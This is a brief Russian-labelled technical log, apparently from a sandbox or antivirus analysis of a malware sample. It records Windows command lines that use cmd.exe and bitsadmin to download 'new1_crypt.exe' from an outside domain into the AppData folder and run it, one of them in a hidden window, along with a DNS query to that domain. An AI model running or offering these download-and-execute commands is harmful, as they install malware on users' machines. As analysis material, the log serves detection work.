Техническая информация
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer myjob /download /priority normal http://findserviceapp.com.br/new1_crypt.exe %appdata%\123.exe&start %appdata%\123.exe
- DNS ASK fi#####viceapp.com.br
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer myjob /download /priority normal http://findserviceapp.com.br/new1_crypt.exe %appdata%\123.exe&start %appdata%\123.exe' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer myjob /download /priority normal http://findserviceapp.com.br/new1_crypt.exe %APPDATA%\123.exe